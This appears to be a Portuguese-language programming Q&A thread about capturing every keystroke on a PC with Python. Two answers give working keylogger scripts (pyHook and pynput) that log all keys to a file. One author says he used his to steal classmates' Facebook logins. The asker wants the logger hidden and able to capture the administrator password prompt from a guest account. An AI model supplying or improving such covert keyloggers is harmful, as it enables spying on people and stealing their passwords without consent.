# Como faço para capturar cada tecla digitada em python

Tags: python, python-3.x, tkinter, python-kivy

estou tentado fazer um programa que capture as teclas digitadas no pc, para que depois eu possa acessa-las. Não sei por onde começar. Não sei se usa o sqlite3 (banco de dados), no google eu pesquisei, mas algumas explicaçõe são zero.

Comment: Só fiquei muito curioso, o que o `sqlite` tem haver com teclas capturadas ? você quer criar um keylogger ? jogar em um banco de dados todas as teclas que eventualmente alguém digitou no windows ? se eu entendi direito não sei se python tem esse poder todo para captura de teclas de todo o Sistema Operacional(nunca vi uma lib assim para python), eu acho que você só vai conseguir capturar as teclas que estiverem no plano de execução do seu script e não em todo o sistema operacional ....

Comment: Talvez não tenha nada haver uma coisa com a outra, a ideia era que todas as teclas fossem salvas em um arquivo ***txt** após ser fechado o programa, igual esse que eu postei de 13 Linhas (ele não usa sqlite3, mas é a mesma função que eu estava procurando)

Answer (score 1):

Realmente a biblioteca keyboard funciona pra python 2x e 3x.

https://pypi.org/project/keyboard/

Depois de instalar, 'e so importar e usar o metodo **keyboard.wait(teclaALVO)** e seja feliz implementando seu codigo.

Answer (score 1):

Cara se vc quer fazer um Keylogger eu já tinha um código que eu usava na escola pra "hackear" o facebook do pessoal (eu era uma má pessoa)

```
import pyHook, pythoncom, sys, logging
# feel free to set the file_log to a different file name/location

file_log = 'keyloggeroutput.txt'

def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
```

se vc souber inglês da pra dar uma leitura nesse artigo :

- https://www.instructables.com/id/Simple-Keylogger-Python/

Answer (score 0):

Victor voce poderia iniciar buscando sobre **'KEYBOARD LISTENERS'**.

Um exemplo de biblioteca utilizada no python para captura e escrita do teclado é a:

> keyboard

[Link para a Documentação da biblioteca](https://github.com/boppreh/keyboard)

Seria necessário que você desenvolvesse um pouco do código e estruturasse melhor sua pergunta para uma resposta mais assertiva.

De qualquer maneira segue um exemplo que alterei que pode ser um norte para você:

```
import keyboard
import string
from threading import *

"""
Optional code(extra keys):

keys.append("space_bar")
keys.append("backspace")
keys.append("shift")
keys.append("esc")
"""

# Atribuo a lista de caracteres ascii para a variavel keys(não encontrei lista com todas as teclas)
teclas = list(string.ascii_lowercase)

def listen(tecla):
    while True:
        keyboard.wait(tecla)
        print("- Tecla pressionada: ",tecla)
threads = [Thread(target=listen, kwargs={"tecla":tecla}) for tecla in teclas]

for thread in threads:
    thread.start()
```

Essa rotina lê as teclas pressionadas e 'printa' na tela.

Comment: Anderson utilizei ela a partir do parâmetro da função 'Listen' essa função é utilizada para bloquear a execução do programa até que alguma tecla seja pressionada. No print estou utilizando essa variável (tecla) simplesmente para exibir qual tecla foi pressionada pelo usuário

Comment: Sabe qual é o problema? É que só captura teclas - _letras_, isso não inclui números ou símbolos, sei que é pedir demais, porém quero deixar o programa rodando em oculto.

Comment: nesse caso voce teria de colocar appends manualmente Victor, alterei o código para voce ter ideia

Comment: tentei adicionar, mas eu não consegui.

Comment: eu consegui um outro código, alguém poderia me ajudar?
Eu consegui esconder do jeito que eu queria o programa, porém tem um único problema, por exemplo:
1)Quando eu estou logado na conta de convidado do windows e executo o programa de captura, depois executo o instalador de um determinado programa que peça a permissão do Administrador, ele simplesmente não captura o que é digitado, passa direto ignorando. Queria que ele capturasse o que é digitado nessa janela que pede a senha do ADM do pc, vou colocar o código aqui.

Answer (score 0):

Em apenas 13 Linhas, esse programa faz um trabalho gigantesco com apenas uma desvantagem:

```
from pynput.keyboard import Key, Listener
import logging

log_dir = "C:/Users/"

logging.basicConfig(filename=(log_dir + "key_log.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()
```

A desvantagem é que quando abre a janela que pede a senha do administrador do computador ele não captura o que é digitado.